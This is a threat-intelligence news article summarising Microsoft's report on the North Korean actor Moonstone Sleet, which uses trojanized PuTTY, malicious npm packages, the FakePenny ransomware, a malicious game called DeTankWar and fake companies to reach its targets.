Microsoft has recently discovered a new threat actor from North Korea named Moonstone Sleet, previously known as Storm-1789, that is utilizing a mix of conventional and inventive tactics to achieve its cyberespionage and financial goals. This sophisticated threat actor has been employing strategies such as fake companies, trojanized software, and even a malicious game to infiltrate its targets.
Moonstone Sleet has been observed using trojanized versions of legitimate tools like PuTTY to gain initial access to organizations. By delivering a modified PuTTY executable through platforms like LinkedIn and Telegram, the actor is able to decrypt and load additional malicious payloads, expanding its reach and capabilities. Additionally, Moonstone Sleet has also utilized malicious npm packages to target software developers, often disguising these packages as part of skills assessments or project collaborations.
According to a report by Microsoft, Moonstone Sleet’s tactics demonstrate its ability to adapt and evolve its strategies, resembling techniques used by other North Korean threat actors like Diamond Sleet. This adaptability indicates a high level of sophistication and a willingness to stay ahead of cybersecurity measures.
One of the standout tactics employed by Moonstone Sleet is the use of a custom ransomware variant known as FakePenny. This ransomware was deployed in an attack in April, following a previous compromise in February. The actor demanded a substantial ransom of $6.6 million in Bitcoin, showcasing its significant financial motivations. Moreover, Moonstone Sleet has developed a fully functional malicious game called DeTankWar, which requires player registration and is used as a vehicle to deliver malware.
The actor has promoted the malicious game through fake companies and social media personas, adding a layer of legitimacy to its campaigns. Moonstone Sleet’s operations are marked by their breadth and complexity, with the creation of fake companies like StarGlow Ventures and C.C. Waterfall to engage with potential targets in the education and software development sectors. These companies serve as a facade to build relationships with organizations, potentially for future malicious access or revenue generation.
The ability of Moonstone Sleet to conduct multiple operations across various campaigns simultaneously indicates that it is well-resourced and capable of expanding its capabilities, including the use of ransomware for disruptive operations. This level of coordination and sophistication poses a significant threat to organizations targeted by this North Korean threat actor.
In conclusion, Moonstone Sleet’s emergence as a new threat actor highlights the evolving landscape of cybersecurity threats and the importance of vigilance and proactive defense measures against such sophisticated adversaries. Organizations must stay informed about the latest tactics and strategies employed by threat actors like Moonstone Sleet to safeguard their data and infrastructure effectively.